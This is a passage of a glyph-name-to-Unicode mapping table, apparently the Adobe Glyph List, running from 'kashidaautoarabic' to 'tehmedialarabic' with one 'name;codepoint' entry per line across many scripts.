kashidaautoarabic;0640
kashidaautonosidebearingarabic;0640
kasmallkatakana;30F5
kasquare;3384
kasraarabic;0650
kasratanarabic;064D
kastrokecyrillic;049F
katahiraprolongmarkhalfwidth;FF70
kaverticalstrokecyrillic;049D
kbopomofo;310E
kcalsquare;3389
kcaron;01E9
kcedilla;0137
kcircle;24DA
kcommaaccent;0137
kdotbelow;1E33
keharmenian;0584
kehiragana;3051
kekatakana;30B1
kekatakanahalfwidth;FF79
kenarmenian;056F
kesmallkatakana;30F6
kgreenlandic;0138
khabengali;0996
khacyrillic;0445
khadeva;0916
khagujarati;0A96
khagurmukhi;0A16
khaharabic;062E
khahfinalarabic;FEA6
khahinitialarabic;FEA7
khahmedialarabic;FEA8
kheicoptic;03E7
khhadeva;0959
khhagurmukhi;0A59
khieukhacirclekorean;3278
khieukhaparenkorean;3218
khieukhcirclekorean;326A
khieukhkorean;314B
khieukhparenkorean;320A
khokhaithai;0E02
khokhonthai;0E05
khokhuatthai;0E03
khokhwaithai;0E04
khomutthai;0E5B
khook;0199
khorakhangthai;0E06
khzsquare;3391
kihiragana;304D
kikatakana;30AD
kikatakanahalfwidth;FF77
kiroguramusquare;3315
kiromeetorusquare;3316
kirosquare;3314
kiyeokacirclekorean;326E
kiyeokaparenkorean;320E
kiyeokcirclekorean;3260
kiyeokkorean;3131
kiyeokparenkorean;3200
kiyeoksioskorean;3133
kjecyrillic;045C
klinebelow;1E35
klsquare;3398
kmcubedsquare;33A6
kmonospace;FF4B
kmsquaredsquare;33A2
kohiragana;3053
kohmsquare;33C0
kokaithai;0E01
kokatakana;30B3
kokatakanahalfwidth;FF7A
kooposquare;331E
koppacyrillic;0481
koreanstandardsymbol;327F
koroniscmb;0343
kparen;24A6
kpasquare;33AA
ksicyrillic;046F
ktsquare;33CF
kturned;029E
kuhiragana;304F
kukatakana;30AF
kukatakanahalfwidth;FF78
kvsquare;33B8
kwsquare;33BE
l;006C
labengali;09B2
lacute;013A
ladeva;0932
lagujarati;0AB2
lagurmukhi;0A32
lakkhangyaothai;0E45
lamaleffinalarabic;FEFC
lamalefhamzaabovefinalarabic;FEF8
lamalefhamzaaboveisolatedarabic;FEF7
lamalefhamzabelowfinalarabic;FEFA
lamalefhamzabelowisolatedarabic;FEF9
lamalefisolatedarabic;FEFB
lamalefmaddaabovefinalarabic;FEF6
lamalefmaddaaboveisolatedarabic;FEF5
lamarabic;0644
lambda;03BB
lambdastroke;019B
lamed;05DC
lameddagesh;FB3C
lameddageshhebrew;FB3C
lamedhebrew;05DC
lamedholam;05DC 05B9
lamedholamdagesh;05DC 05B9 05BC
lamedholamdageshhebrew;05DC 05B9 05BC
lamedholamhebrew;05DC 05B9
lamfinalarabic;FEDE
lamhahinitialarabic;FCCA
laminitialarabic;FEDF
lamjeeminitialarabic;FCC9
lamkhahinitialarabic;FCCB
lamlamhehisolatedarabic;FDF2
lammedialarabic;FEE0
lammeemhahinitialarabic;FD88
lammeeminitialarabic;FCCC
lammeemjeeminitialarabic;FEDF FEE4 FEA0
lammeemkhahinitialarabic;FEDF FEE4 FEA8
largecircle;25EF
lbar;019A
lbelt;026C
lbopomofo;310C
lcaron;013E
lcedilla;013C
lcircle;24DB
lcircumflexbelow;1E3D
lcommaaccent;013C
ldot;0140
ldotaccent;0140
ldotbelow;1E37
ldotbelowmacron;1E39
leftangleabovecmb;031A
lefttackbelowcmb;0318
less;003C
lessequal;2264
lessequalorgreater;22DA
lessmonospace;FF1C
lessorequivalent;2272
lessorgreater;2276
lessoverequal;2266
lesssmall;FE64
lezh;026E
lfblock;258C
lhookretroflex;026D
lira;20A4
liwnarmenian;056C
lj;01C9
ljecyrillic;0459
ll;F6C0
lladeva;0933
llagujarati;0AB3
llinebelow;1E3B
llladeva;0934
llvocalicbengali;09E1
llvocalicdeva;0961
llvocalicvowelsignbengali;09E3
llvocalicvowelsigndeva;0963
lmiddletilde;026B
lmonospace;FF4C
lmsquare;33D0
lochulathai;0E2C
logicaland;2227
logicalnot;00AC
logicalnotreversed;2310
logicalor;2228
lolingthai;0E25
longs;017F
lowlinecenterline;FE4E
lowlinecmb;0332
lowlinedashed;FE4D
lozenge;25CA
lparen;24A7
lslash;0142
lsquare;2113
lsuperior;F6EE
ltshade;2591
luthai;0E26
lvocalicbengali;098C
lvocalicdeva;090C
lvocalicvowelsignbengali;09E2
lvocalicvowelsigndeva;0962
lxsquare;33D3
m;006D
mabengali;09AE
macron;00AF
macronbelowcmb;0331
macroncmb;0304
macronlowmod;02CD
macronmonospace;FFE3
macute;1E3F
madeva;092E
magujarati;0AAE
magurmukhi;0A2E
mahapakhhebrew;05A4
mahapakhlefthebrew;05A4
mahiragana;307E
maichattawalowleftthai;F895
maichattawalowrightthai;F894
maichattawathai;0E4B
maichattawaupperleftthai;F893
maieklowleftthai;F88C
maieklowrightthai;F88B
maiekthai;0E48
maiekupperleftthai;F88A
maihanakatleftthai;F884
maihanakatthai;0E31
maitaikhuleftthai;F889
maitaikhuthai;0E47
maitholowleftthai;F88F
maitholowrightthai;F88E
maithothai;0E49
maithoupperleftthai;F88D
maitrilowleftthai;F892
maitrilowrightthai;F891
maitrithai;0E4A
maitriupperleftthai;F890
maiyamokthai;0E46
makatakana;30DE
makatakanahalfwidth;FF8F
male;2642
mansyonsquare;3347
maqafhebrew;05BE
mars;2642
masoracirclehebrew;05AF
masquare;3383
mbopomofo;3107
mbsquare;33D4
mcircle;24DC
mcubedsquare;33A5
mdotaccent;1E41
mdotbelow;1E43
meemarabic;0645
meemfinalarabic;FEE2
meeminitialarabic;FEE3
meemmedialarabic;FEE4
meemmeeminitialarabic;FCD1
meemmeemisolatedarabic;FC48
meetorusquare;334D
mehiragana;3081
meizierasquare;337E
mekatakana;30E1
mekatakanahalfwidth;FF92
mem;05DE
memdagesh;FB3E
memdageshhebrew;FB3E
memhebrew;05DE
menarmenian;0574
merkhahebrew;05A5
merkhakefulahebrew;05A6
merkhakefulalefthebrew;05A6
merkhalefthebrew;05A5
mhook;0271
mhzsquare;3392
middledotkatakanahalfwidth;FF65
middot;00B7
mieumacirclekorean;3272
mieumaparenkorean;3212
mieumcirclekorean;3264
mieumkorean;3141
mieumpansioskorean;3170
mieumparenkorean;3204
mieumpieupkorean;316E
mieumsioskorean;316F
mihiragana;307F
mikatakana;30DF
mikatakanahalfwidth;FF90
minus;2212
minusbelowcmb;0320
minuscircle;2296
minusmod;02D7
minusplus;2213
minute;2032
miribaarusquare;334A
mirisquare;3349
mlonglegturned;0270
mlsquare;3396
mmcubedsquare;33A3
mmonospace;FF4D
mmsquaredsquare;339F
mohiragana;3082
mohmsquare;33C1
mokatakana;30E2
mokatakanahalfwidth;FF93
molsquare;33D6
momathai;0E21
moverssquare;33A7
moverssquaredsquare;33A8
mparen;24A8
mpasquare;33AB
mssquare;33B3
msuperior;F6EF
mturned;026F
mu;00B5
mu1;00B5
muasquare;3382
muchgreater;226B
muchless;226A
mufsquare;338C
mugreek;03BC
mugsquare;338D
muhiragana;3080
mukatakana;30E0
mukatakanahalfwidth;FF91
mulsquare;3395
multiply;00D7
mumsquare;339B
munahhebrew;05A3
munahlefthebrew;05A3
musicalnote;266A
musicalnotedbl;266B
musicflatsign;266D
musicsharpsign;266F
mussquare;33B2
muvsquare;33B6
muwsquare;33BC
mvmegasquare;33B9
mvsquare;33B7
mwmegasquare;33BF
mwsquare;33BD
n;006E
nabengali;09A8
nabla;2207
nacute;0144
nadeva;0928
nagujarati;0AA8
nagurmukhi;0A28
nahiragana;306A
nakatakana;30CA
nakatakanahalfwidth;FF85
napostrophe;0149
nasquare;3381
nbopomofo;310B
nbspace;00A0
ncaron;0148
ncedilla;0146
ncircle;24DD
ncircumflexbelow;1E4B
ncommaaccent;0146
ndotaccent;1E45
ndotbelow;1E47
nehiragana;306D
nekatakana;30CD
nekatakanahalfwidth;FF88
newsheqelsign;20AA
nfsquare;338B
ngabengali;0999
ngadeva;0919
ngagujarati;0A99
ngagurmukhi;0A19
ngonguthai;0E07
nhiragana;3093
nhookleft;0272
nhookretroflex;0273
nieunacirclekorean;326F
nieunaparenkorean;320F
nieuncieuckorean;3135
nieuncirclekorean;3261
nieunhieuhkorean;3136
nieunkorean;3134
nieunpansioskorean;3168
nieunparenkorean;3201
nieunsioskorean;3167
nieuntikeutkorean;3166
nihiragana;306B
nikatakana;30CB
nikatakanahalfwidth;FF86
nikhahitleftthai;F899
nikhahitthai;0E4D
nine;0039
ninearabic;0669
ninebengali;09EF
ninecircle;2468
ninecircleinversesansserif;2792
ninedeva;096F
ninegujarati;0AEF
ninegurmukhi;0A6F
ninehackarabic;0669
ninehangzhou;3029
nineideographicparen;3228
nineinferior;2089
ninemonospace;FF19
nineoldstyle;F739
nineparen;247C
nineperiod;2490
ninepersian;06F9
nineroman;2178
ninesuperior;2079
nineteencircle;2472
nineteenparen;2486
nineteenperiod;249A
ninethai;0E59
nj;01CC
njecyrillic;045A
nkatakana;30F3
nkatakanahalfwidth;FF9D
nlegrightlong;019E
nlinebelow;1E49
nmonospace;FF4E
nmsquare;339A
nnabengali;09A3
nnadeva;0923
nnagujarati;0AA3
nnagurmukhi;0A23
nnnadeva;0929
nohiragana;306E
nokatakana;30CE
nokatakanahalfwidth;FF89
nonbreakingspace;00A0
nonenthai;0E13
nonuthai;0E19
noonarabic;0646
noonfinalarabic;FEE6
noonghunnaarabic;06BA
noonghunnafinalarabic;FB9F
noonhehinitialarabic;FEE7 FEEC
nooninitialarabic;FEE7
noonjeeminitialarabic;FCD2
noonjeemisolatedarabic;FC4B
noonmedialarabic;FEE8
noonmeeminitialarabic;FCD5
noonmeemisolatedarabic;FC4E
noonnoonfinalarabic;FC8D
notcontains;220C
notelement;2209
notelementof;2209
notequal;2260
notgreater;226F
notgreaternorequal;2271
notgreaternorless;2279
notidentical;2262
notless;226E
notlessnorequal;2270
notparallel;2226
notprecedes;2280
notsubset;2284
notsucceeds;2281
notsuperset;2285
nowarmenian;0576
nparen;24A9
nssquare;33B1
nsuperior;207F
ntilde;00F1
nu;03BD
nuhiragana;306C
nukatakana;30CC
nukatakanahalfwidth;FF87
nuktabengali;09BC
nuktadeva;093C
nuktagujarati;0ABC
nuktagurmukhi;0A3C
numbersign;0023
numbersignmonospace;FF03
numbersignsmall;FE5F
numeralsigngreek;0374
numeralsignlowergreek;0375
numero;2116
nun;05E0
nundagesh;FB40
nundageshhebrew;FB40
nunhebrew;05E0
nvsquare;33B5
nwsquare;33BB
nyabengali;099E
nyadeva;091E
nyagujarati;0A9E
nyagurmukhi;0A1E
o;006F
oacute;00F3
oangthai;0E2D
obarred;0275
obarredcyrillic;04E9
obarreddieresiscyrillic;04EB
obengali;0993
obopomofo;311B
obreve;014F
ocandradeva;0911
ocandragujarati;0A91
ocandravowelsigndeva;0949
ocandravowelsigngujarati;0AC9
ocaron;01D2
ocircle;24DE
ocircumflex;00F4
ocircumflexacute;1ED1
ocircumflexdotbelow;1ED9
ocircumflexgrave;1ED3
ocircumflexhookabove;1ED5
ocircumflextilde;1ED7
ocyrillic;043E
odblacute;0151
odblgrave;020D
odeva;0913
odieresis;00F6
odieresiscyrillic;04E7
odotbelow;1ECD
oe;0153
oekorean;315A
ogonek;02DB
ogonekcmb;0328
ograve;00F2
ogujarati;0A93
oharmenian;0585
ohiragana;304A
ohookabove;1ECF
ohorn;01A1
ohornacute;1EDB
ohorndotbelow;1EE3
ohorngrave;1EDD
ohornhookabove;1EDF
ohorntilde;1EE1
ohungarumlaut;0151
oi;01A3
oinvertedbreve;020F
okatakana;30AA
okatakanahalfwidth;FF75
okorean;3157
olehebrew;05AB
omacron;014D
omacronacute;1E53
omacrongrave;1E51
omdeva;0950
omega;03C9
omega1;03D6
omegacyrillic;0461
omegalatinclosed;0277
omegaroundcyrillic;047B
omegatitlocyrillic;047D
omegatonos;03CE
omgujarati;0AD0
omicron;03BF
omicrontonos;03CC
omonospace;FF4F
one;0031
onearabic;0661
onebengali;09E7
onecircle;2460
onecircleinversesansserif;278A
onedeva;0967
onedotenleader;2024
oneeighth;215B
onefitted;F6DC
onegujarati;0AE7
onegurmukhi;0A67
onehackarabic;0661
onehalf;00BD
onehangzhou;3021
oneideographicparen;3220
oneinferior;2081
onemonospace;FF11
onenumeratorbengali;09F4
oneoldstyle;F731
oneparen;2474
oneperiod;2488
onepersian;06F1
onequarter;00BC
oneroman;2170
onesuperior;00B9
onethai;0E51
onethird;2153
oogonek;01EB
oogonekmacron;01ED
oogurmukhi;0A13
oomatragurmukhi;0A4B
oopen;0254
oparen;24AA
openbullet;25E6
option;2325
ordfeminine;00AA
ordmasculine;00BA
orthogonal;221F
oshortdeva;0912
oshortvowelsigndeva;094A
oslash;00F8
oslashacute;01FF
osmallhiragana;3049
osmallkatakana;30A9
osmallkatakanahalfwidth;FF6B
ostrokeacute;01FF
osuperior;F6F0
otcyrillic;047F
otilde;00F5
otildeacute;1E4D
otildedieresis;1E4F
oubopomofo;3121
overline;203E
overlinecenterline;FE4A
overlinecmb;0305
overlinedashed;FE49
overlinedblwavy;FE4C
overlinewavy;FE4B
overscore;00AF
ovowelsignbengali;09CB
ovowelsigndeva;094B
ovowelsigngujarati;0ACB
p;0070
paampssquare;3380
paasentosquare;332B
pabengali;09AA
pacute;1E55
padeva;092A
pagedown;21DF
pageup;21DE
pagujarati;0AAA
pagurmukhi;0A2A
pahiragana;3071
paiyannoithai;0E2F
pakatakana;30D1
palatalizationcyrilliccmb;0484
palochkacyrillic;04C0
pansioskorean;317F
paragraph;00B6
parallel;2225
parenleft;0028
parenleftaltonearabic;FD3E
parenleftbt;F8ED
parenleftex;F8EC
parenleftinferior;208D
parenleftmonospace;FF08
parenleftsmall;FE59
parenleftsuperior;207D
parenlefttp;F8EB
parenleftvertical;FE35
parenright;0029
parenrightaltonearabic;FD3F
parenrightbt;F8F8
parenrightex;F8F7
parenrightinferior;208E
parenrightmonospace;FF09
parenrightsmall;FE5A
parenrightsuperior;207E
parenrighttp;F8F6
parenrightvertical;FE36
partialdiff;2202
paseqhebrew;05C0
pashtahebrew;0599
pasquare;33A9
patah;05B7
patah11;05B7
patah1d;05B7
patah2a;05B7
patahhebrew;05B7
patahnarrowhebrew;05B7
patahquarterhebrew;05B7
patahwidehebrew;05B7
pazerhebrew;05A1
pbopomofo;3106
pcircle;24DF
pdotaccent;1E57
pe;05E4
pecyrillic;043F
pedagesh;FB44
pedageshhebrew;FB44
peezisquare;333B
pefinaldageshhebrew;FB43
peharabic;067E
peharmenian;057A
pehebrew;05E4
pehfinalarabic;FB57
pehinitialarabic;FB58
pehiragana;307A
pehmedialarabic;FB59
pekatakana;30DA
pemiddlehookcyrillic;04A7
perafehebrew;FB4E
percent;0025
percentarabic;066A
percentmonospace;FF05
percentsmall;FE6A
period;002E
periodarmenian;0589
periodcentered;00B7
periodhalfwidth;FF61
periodinferior;F6E7
periodmonospace;FF0E
periodsmall;FE52
periodsuperior;F6E8
perispomenigreekcmb;0342
perpendicular;22A5
perthousand;2030
peseta;20A7
pfsquare;338A
phabengali;09AB
phadeva;092B
phagujarati;0AAB
phagurmukhi;0A2B
phi;03C6
phi1;03D5
phieuphacirclekorean;327A
phieuphaparenkorean;321A
phieuphcirclekorean;326C
phieuphkorean;314D
phieuphparenkorean;320C
philatin;0278
phinthuthai;0E3A
phisymbolgreek;03D5
phook;01A5
phophanthai;0E1E
phophungthai;0E1C
phosamphaothai;0E20
pi;03C0
pieupacirclekorean;3273
pieupaparenkorean;3213
pieupcieuckorean;3176
pieupcirclekorean;3265
pieupkiyeokkorean;3172
pieupkorean;3142
pieupparenkorean;3205
pieupsioskiyeokkorean;3174
pieupsioskorean;3144
pieupsiostikeutkorean;3175
pieupthieuthkorean;3177
pieuptikeutkorean;3173
pihiragana;3074
pikatakana;30D4
pisymbolgreek;03D6
piwrarmenian;0583
plus;002B
plusbelowcmb;031F
pluscircle;2295
plusminus;00B1
plusmod;02D6
plusmonospace;FF0B
plussmall;FE62
plussuperior;207A
pmonospace;FF50
pmsquare;33D8
pohiragana;307D
pointingindexdownwhite;261F
pointingindexleftwhite;261C
pointingindexrightwhite;261E
pointingindexupwhite;261D
pokatakana;30DD
poplathai;0E1B
postalmark;3012
postalmarkface;3020
pparen;24AB
precedes;227A
prescription;211E
primemod;02B9
primereversed;2035
product;220F
projective;2305
prolongedkana;30FC
propellor;2318
propersubset;2282
propersuperset;2283
proportion;2237
proportional;221D
psi;03C8
psicyrillic;0471
psilipneumatacyrilliccmb;0486
pssquare;33B0
puhiragana;3077
pukatakana;30D7
pvsquare;33B4
pwsquare;33BA
q;0071
qadeva;0958
qadmahebrew;05A8
qafarabic;0642
qaffinalarabic;FED6
qafinitialarabic;FED7
qafmedialarabic;FED8
qamats;05B8
qamats10;05B8
qamats1a;05B8
qamats1c;05B8
qamats27;05B8
qamats29;05B8
qamats33;05B8
qamatsde;05B8
qamatshebrew;05B8
qamatsnarrowhebrew;05B8
qamatsqatanhebrew;05B8
qamatsqatannarrowhebrew;05B8
qamatsqatanquarterhebrew;05B8
qamatsqatanwidehebrew;05B8
qamatsquarterhebrew;05B8
qamatswidehebrew;05B8
qarneyparahebrew;059F
qbopomofo;3111
qcircle;24E0
qhook;02A0
qmonospace;FF51
qof;05E7
qofdagesh;FB47
qofdageshhebrew;FB47
qofhatafpatah;05E7 05B2
qofhatafpatahhebrew;05E7 05B2
qofhatafsegol;05E7 05B1
qofhatafsegolhebrew;05E7 05B1
qofhebrew;05E7
qofhiriq;05E7 05B4
qofhiriqhebrew;05E7 05B4
qofholam;05E7 05B9
qofholamhebrew;05E7 05B9
qofpatah;05E7 05B7
qofpatahhebrew;05E7 05B7
qofqamats;05E7 05B8
qofqamatshebrew;05E7 05B8
qofqubuts;05E7 05BB
qofqubutshebrew;05E7 05BB
qofsegol;05E7 05B6
qofsegolhebrew;05E7 05B6
qofsheva;05E7 05B0
qofshevahebrew;05E7 05B0
qoftsere;05E7 05B5
qoftserehebrew;05E7 05B5
qparen;24AC
quarternote;2669
qubuts;05BB
qubuts18;05BB
qubuts25;05BB
qubuts31;05BB
qubutshebrew;05BB
qubutsnarrowhebrew;05BB
qubutsquarterhebrew;05BB
qubutswidehebrew;05BB
question;003F
questionarabic;061F
questionarmenian;055E
questiondown;00BF
questiondownsmall;F7BF
questiongreek;037E
questionmonospace;FF1F
questionsmall;F73F
quotedbl;0022
quotedblbase;201E
quotedblleft;201C
quotedblmonospace;FF02
quotedblprime;301E
quotedblprimereversed;301D
quotedblright;201D
quoteleft;2018
quoteleftreversed;201B
quotereversed;201B
quoteright;2019
quoterightn;0149
quotesinglbase;201A
quotesingle;0027
quotesinglemonospace;FF07
r;0072
raarmenian;057C
rabengali;09B0
racute;0155
radeva;0930
radical;221A
radicalex;F8E5
radoverssquare;33AE
radoverssquaredsquare;33AF
radsquare;33AD
rafe;05BF
rafehebrew;05BF
ragujarati;0AB0
ragurmukhi;0A30
rahiragana;3089
rakatakana;30E9
rakatakanahalfwidth;FF97
ralowerdiagonalbengali;09F1
ramiddlediagonalbengali;09F0
ramshorn;0264
ratio;2236
rbopomofo;3116
rcaron;0159
rcedilla;0157
rcircle;24E1
rcommaaccent;0157
rdblgrave;0211
rdotaccent;1E59
rdotbelow;1E5B
rdotbelowmacron;1E5D
referencemark;203B
reflexsubset;2286
reflexsuperset;2287
registered;00AE
registersans;F8E8
registerserif;F6DA
reharabic;0631
reharmenian;0580
rehfinalarabic;FEAE
rehiragana;308C
rehyehaleflamarabic;0631 FEF3 FE8E 0644
rekatakana;30EC
rekatakanahalfwidth;FF9A
resh;05E8
reshdageshhebrew;FB48
reshhatafpatah;05E8 05B2
reshhatafpatahhebrew;05E8 05B2
reshhatafsegol;05E8 05B1
reshhatafsegolhebrew;05E8 05B1
reshhebrew;05E8
reshhiriq;05E8 05B4
reshhiriqhebrew;05E8 05B4
reshholam;05E8 05B9
reshholamhebrew;05E8 05B9
reshpatah;05E8 05B7
reshpatahhebrew;05E8 05B7
reshqamats;05E8 05B8
reshqamatshebrew;05E8 05B8
reshqubuts;05E8 05BB
reshqubutshebrew;05E8 05BB
reshsegol;05E8 05B6
reshsegolhebrew;05E8 05B6
reshsheva;05E8 05B0
reshshevahebrew;05E8 05B0
reshtsere;05E8 05B5
reshtserehebrew;05E8 05B5
reversedtilde;223D
reviahebrew;0597
reviamugrashhebrew;0597
revlogicalnot;2310
rfishhook;027E
rfishhookreversed;027F
rhabengali;09DD
rhadeva;095D
rho;03C1
rhook;027D
rhookturned;027B
rhookturnedsuperior;02B5
rhosymbolgreek;03F1
rhotichookmod;02DE
rieulacirclekorean;3271
rieulaparenkorean;3211
rieulcirclekorean;3263
rieulhieuhkorean;3140
rieulkiyeokkorean;313A
rieulkiyeoksioskorean;3169
rieulkorean;3139
rieulmieumkorean;313B
rieulpansioskorean;316C
rieulparenkorean;3203
rieulphieuphkorean;313F
rieulpieupkorean;313C
rieulpieupsioskorean;316B
rieulsioskorean;313D
rieulthieuthkorean;313E
rieultikeutkorean;316A
rieulyeorinhieuhkorean;316D
rightangle;221F
righttackbelowcmb;0319
righttriangle;22BF
rihiragana;308A
rikatakana;30EA
rikatakanahalfwidth;FF98
ring;02DA
ringbelowcmb;0325
ringcmb;030A
ringhalfleft;02BF
ringhalfleftarmenian;0559
ringhalfleftbelowcmb;031C
ringhalfleftcentered;02D3
ringhalfright;02BE
ringhalfrightbelowcmb;0339
ringhalfrightcentered;02D2
rinvertedbreve;0213
rittorusquare;3351
rlinebelow;1E5F
rlongleg;027C
rlonglegturned;027A
rmonospace;FF52
rohiragana;308D
rokatakana;30ED
rokatakanahalfwidth;FF9B
roruathai;0E23
rparen;24AD
rrabengali;09DC
rradeva;0931
rragurmukhi;0A5C
rreharabic;0691
rrehfinalarabic;FB8D
rrvocalicbengali;09E0
rrvocalicdeva;0960
rrvocalicgujarati;0AE0
rrvocalicvowelsignbengali;09C4
rrvocalicvowelsigndeva;0944
rrvocalicvowelsigngujarati;0AC4
rsuperior;F6F1
rtblock;2590
rturned;0279
rturnedsuperior;02B4
ruhiragana;308B
rukatakana;30EB
rukatakanahalfwidth;FF99
rupeemarkbengali;09F2
rupeesignbengali;09F3
rupiah;F6DD
ruthai;0E24
rvocalicbengali;098B
rvocalicdeva;090B
rvocalicgujarati;0A8B
rvocalicvowelsignbengali;09C3
rvocalicvowelsigndeva;0943
rvocalicvowelsigngujarati;0AC3
s;0073
sabengali;09B8
sacute;015B
sacutedotaccent;1E65
sadarabic;0635
sadeva;0938
sadfinalarabic;FEBA
sadinitialarabic;FEBB
sadmedialarabic;FEBC
sagujarati;0AB8
sagurmukhi;0A38
sahiragana;3055
sakatakana;30B5
sakatakanahalfwidth;FF7B
sallallahoualayhewasallamarabic;FDFA
samekh;05E1
samekhdagesh;FB41
samekhdageshhebrew;FB41
samekhhebrew;05E1
saraaathai;0E32
saraaethai;0E41
saraaimaimalaithai;0E44
saraaimaimuanthai;0E43
saraamthai;0E33
saraathai;0E30
saraethai;0E40
saraiileftthai;F886
saraiithai;0E35
saraileftthai;F885
saraithai;0E34
saraothai;0E42
saraueeleftthai;F888
saraueethai;0E37
saraueleftthai;F887
sarauethai;0E36
sarauthai;0E38
sarauuthai;0E39
sbopomofo;3119
scaron;0161
scarondotaccent;1E67
scedilla;015F
schwa;0259
schwacyrillic;04D9
schwadieresiscyrillic;04DB
schwahook;025A
scircle;24E2
scircumflex;015D
scommaaccent;0219
sdotaccent;1E61
sdotbelow;1E63
sdotbelowdotaccent;1E69
seagullbelowcmb;033C
second;2033
secondtonechinese;02CA
section;00A7
seenarabic;0633
seenfinalarabic;FEB2
seeninitialarabic;FEB3
seenmedialarabic;FEB4
segol;05B6
segol13;05B6
segol1f;05B6
segol2c;05B6
segolhebrew;05B6
segolnarrowhebrew;05B6
segolquarterhebrew;05B6
segoltahebrew;0592
segolwidehebrew;05B6
seharmenian;057D
sehiragana;305B
sekatakana;30BB
sekatakanahalfwidth;FF7E
semicolon;003B
semicolonarabic;061B
semicolonmonospace;FF1B
semicolonsmall;FE54
semivoicedmarkkana;309C
semivoicedmarkkanahalfwidth;FF9F
sentisquare;3322
sentosquare;3323
seven;0037
sevenarabic;0667
sevenbengali;09ED
sevencircle;2466
sevencircleinversesansserif;2790
sevendeva;096D
seveneighths;215E
sevengujarati;0AED
sevengurmukhi;0A6D
sevenhackarabic;0667
sevenhangzhou;3027
sevenideographicparen;3226
seveninferior;2087
sevenmonospace;FF17
sevenoldstyle;F737
sevenparen;247A
sevenperiod;248E
sevenpersian;06F7
sevenroman;2176
sevensuperior;2077
seventeencircle;2470
seventeenparen;2484
seventeenperiod;2498
seventhai;0E57
sfthyphen;00AD
shaarmenian;0577
shabengali;09B6
shacyrillic;0448
shaddaarabic;0651
shaddadammaarabic;FC61
shaddadammatanarabic;FC5E
shaddafathaarabic;FC60
shaddafathatanarabic;0651 064B
shaddakasraarabic;FC62
shaddakasratanarabic;FC5F
shade;2592
shadedark;2593
shadelight;2591
shademedium;2592
shadeva;0936
shagujarati;0AB6
shagurmukhi;0A36
shalshelethebrew;0593
shbopomofo;3115
shchacyrillic;0449
sheenarabic;0634
sheenfinalarabic;FEB6
sheeninitialarabic;FEB7
sheenmedialarabic;FEB8
sheicoptic;03E3
sheqel;20AA
sheqelhebrew;20AA
sheva;05B0
sheva115;05B0
sheva15;05B0
sheva22;05B0
sheva2e;05B0
shevahebrew;05B0
shevanarrowhebrew;05B0
shevaquarterhebrew;05B0
shevawidehebrew;05B0
shhacyrillic;04BB
shimacoptic;03ED
shin;05E9
shindagesh;FB49
shindageshhebrew;FB49
shindageshshindot;FB2C
shindageshshindothebrew;FB2C
shindageshsindot;FB2D
shindageshsindothebrew;FB2D
shindothebrew;05C1
shinhebrew;05E9
shinshindot;FB2A
shinshindothebrew;FB2A
shinsindot;FB2B
shinsindothebrew;FB2B
shook;0282
sigma;03C3
sigma1;03C2
sigmafinal;03C2
sigmalunatesymbolgreek;03F2
sihiragana;3057
sikatakana;30B7
sikatakanahalfwidth;FF7C
siluqhebrew;05BD
siluqlefthebrew;05BD
similar;223C
sindothebrew;05C2
siosacirclekorean;3274
siosaparenkorean;3214
sioscieuckorean;317E
sioscirclekorean;3266
sioskiyeokkorean;317A
sioskorean;3145
siosnieunkorean;317B
siosparenkorean;3206
siospieupkorean;317D
siostikeutkorean;317C
six;0036
sixarabic;0666
sixbengali;09EC
sixcircle;2465
sixcircleinversesansserif;278F
sixdeva;096C
sixgujarati;0AEC
sixgurmukhi;0A6C
sixhackarabic;0666
sixhangzhou;3026
sixideographicparen;3225
sixinferior;2086
sixmonospace;FF16
sixoldstyle;F736
sixparen;2479
sixperiod;248D
sixpersian;06F6
sixroman;2175
sixsuperior;2076
sixteencircle;246F
sixteencurrencydenominatorbengali;09F9
sixteenparen;2483
sixteenperiod;2497
sixthai;0E56
slash;002F
slashmonospace;FF0F
slong;017F
slongdotaccent;1E9B
smileface;263A
smonospace;FF53
sofpasuqhebrew;05C3
softhyphen;00AD
softsigncyrillic;044C
sohiragana;305D
sokatakana;30BD
sokatakanahalfwidth;FF7F
soliduslongoverlaycmb;0338
solidusshortoverlaycmb;0337
sorusithai;0E29
sosalathai;0E28
sosothai;0E0B
sosuathai;0E2A
space;0020
spacehackarabic;0020
spade;2660
spadesuitblack;2660
spadesuitwhite;2664
sparen;24AE
squarebelowcmb;033B
squarecc;33C4
squarecm;339D
squarediagonalcrosshatchfill;25A9
squarehorizontalfill;25A4
squarekg;338F
squarekm;339E
squarekmcapital;33CE
squareln;33D1
squarelog;33D2
squaremg;338E
squaremil;33D5
squaremm;339C
squaremsquared;33A1
squareorthogonalcrosshatchfill;25A6
squareupperlefttolowerrightfill;25A7
squareupperrighttolowerleftfill;25A8
squareverticalfill;25A5
squarewhitewithsmallblack;25A3
srsquare;33DB
ssabengali;09B7
ssadeva;0937
ssagujarati;0AB7
ssangcieuckorean;3149
ssanghieuhkorean;3185
ssangieungkorean;3180
ssangkiyeokkorean;3132
ssangnieunkorean;3165
ssangpieupkorean;3143
ssangsioskorean;3146
ssangtikeutkorean;3138
ssuperior;F6F2
sterling;00A3
sterlingmonospace;FFE1
strokelongoverlaycmb;0336
strokeshortoverlaycmb;0335
subset;2282
subsetnotequal;228A
subsetorequal;2286
succeeds;227B
suchthat;220B
suhiragana;3059
sukatakana;30B9
sukatakanahalfwidth;FF7D
sukunarabic;0652
summation;2211
sun;263C
superset;2283
supersetnotequal;228B
supersetorequal;2287
svsquare;33DC
syouwaerasquare;337C
t;0074
tabengali;09A4
tackdown;22A4
tackleft;22A3
tadeva;0924
tagujarati;0AA4
tagurmukhi;0A24
taharabic;0637
tahfinalarabic;FEC2
tahinitialarabic;FEC3
tahiragana;305F
tahmedialarabic;FEC4
taisyouerasquare;337D
takatakana;30BF
takatakanahalfwidth;FF80
tatweelarabic;0640
tau;03C4
tav;05EA
tavdages;FB4A
tavdagesh;FB4A
tavdageshhebrew;FB4A
tavhebrew;05EA
tbar;0167
tbopomofo;310A
tcaron;0165
tccurl;02A8
tcedilla;0163
tcheharabic;0686
tchehfinalarabic;FB7B
tchehinitialarabic;FB7C
tchehmedialarabic;FB7D
tchehmeeminitialarabic;FB7C FEE4
tcircle;24E3
tcircumflexbelow;1E71
tcommaaccent;0163
tdieresis;1E97
tdotaccent;1E6B
tdotbelow;1E6D
tecyrillic;0442
tedescendercyrillic;04AD
teharabic;062A
tehfinalarabic;FE96
tehhahinitialarabic;FCA2
tehhahisolatedarabic;FC0C
tehinitialarabic;FE97
tehiragana;3066
tehjeeminitialarabic;FCA1
tehjeemisolatedarabic;FC0B
tehmarbutaarabic;0629
tehmarbutafinalarabic;FE94
tehmedialarabic;FE98
